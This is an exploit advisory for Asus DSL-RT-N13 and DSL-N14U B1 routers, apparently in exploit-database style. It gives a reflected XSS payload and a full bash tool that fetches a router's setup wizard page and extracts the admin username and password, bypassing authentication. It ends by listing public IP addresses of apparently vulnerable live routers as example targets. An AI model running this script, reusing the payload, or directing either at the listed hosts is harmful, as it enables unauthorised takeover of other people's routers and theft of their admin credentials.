In the name of god
-------------------------
Exploit Title :
--------------------
Asus Routers (DSL-RT-N13 , DSL-N14U B1) Vulnerability
Date :
---------------
2018/01/29
Exploit Author :
---------------------
4TT4CK3R
Category :
---------------------
Remote and Local
Home Page :
---------------------
https://asus.com
Google Dork :
---------------------
None
Models that Vulnerable in here :
---------------------------------------------
-) DSL-RT-N13 > Bypass Authentication Vulnerability
-) DSL-N14U B1 > Cross Site Scripting Vulnerability
[##] DSL-N14U B1 Cross Site Scripting Vulnerability
--------------------------------------------------------------
This vulnerability works on target remote and local ip address.
Payload : ""><script>alert(window.location)</script>
Vulnerable Page : Main Page
Screenshot :
http://uupload.ir/files/az1i_shot.png
[##] DSL-RT-N13U Bypass Authentication Vulnerability
---------------------------------------------------------------
With this vulnerability we can find administrator username and password and login into admin panel of asus router model DSL-RT-N13.
Exploit source of this vulnerability (ARE Script):
#!/bin/bash
# Asus Routers Exploit (ARE)
# Coded by : 4TT4CK3R
# Category : Local and Remote
# Reuirements : Opening ports 80,8080,443
# Models that affect : DSL-RT N13
reset
dir = "/opt/"
rm -rf /opt/a.htm
clear
echo ""
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"
echo ""
echo -e "\e[93m [+] Tool name: Asus Router Exploit\e[0m"
echo -e "\e[93m [+] Models that affect : DSL-RT N13 \e[0m"
echo -e "\e[93m [+] Coded by: 4TT4CK3R\e[0m"
echo ""
echo " [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]"
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo ""
echo -e "\e[93m Options Of Tool: "
echo ""
echo " 1. Start"
echo " 2. About"
echo " 3. Exit"
echo ""
read -p " Please choose an option: " option
echo ""
echo ""
if [ $option == "2" ]
then
clear
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo " [+] About this tool :"
echo ""
echo -e " Hi dear friend ... This tool is an asus router exploiter.
This tool working with an vulnerability on Asus Routers and we can using
this tool for bypass authentication and exploit the router config panel.
Also this tool working on DSL-RT N13 models of asus company.
Thanks for using this tool and my exploit."
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo ""
elif [ $option == "3" ]
then
clear
exit
elif [ $option == "1" ]
then
clear
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo " [+] Starting Steps "
echo ""
echo ""
read -p " [++] Please enter target ip (ex: 5.2.5.5) : " ip
echo ""
read -p " [++] Please enter port number (ex: 8080) : " port
echo ""
read -p " [++] Please enter protocol (http or https) : " protocol
echo ""
echo " [**] Ok, Please wait ... "
echo ""
curl --silent $protocol://$ip:$port/QIS_wizard.htm > $dir/a.htm
echo ""
echo " [**] Searching data ..."
echo ""
cat $dir/a.htm | grep "http_username" | cut -d " " -f4 | cut -d '"' -f2 > $dir/user
cat $dir/a.htm | grep "http_passwd" | cut -d " " -f4 | cut -d '"' -f2 > $dir/pass
username=$(<$dir/user)
password=$(<$dir/pass)
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
echo " [>>] Address : $protocol://$ip:$port"
echo " [>>] Username : $username"
echo " [>>] Password : $password"
echo ""
for i in {16..21} {21..16} ; do echo -en "\e[48;5;${i}m \e[0m" ; done ; echo
echo ""
else
clear
echo ""
echo " [+] Wrong selection. exiting ..."
sleep 2
exit
fi
exit
Video demo of this tool :
-----------------------------------
https://www.videosprout.com/video?id=be9d22de-6871-4521-96be-1c6def8c2cce
Other routers for example DSL-RT N13 model :
-------------------------------------------------
http://94.190.36.152
http://88.86.198.149:8080
http://220.133.187.27:8080
Other routers for example DSL-N14U B1 model :
-------------------------------------------------
http://80.188.231.233:8080
http://197.89.27.160:8080
Exploited by :
--------------------
4TT4CK3R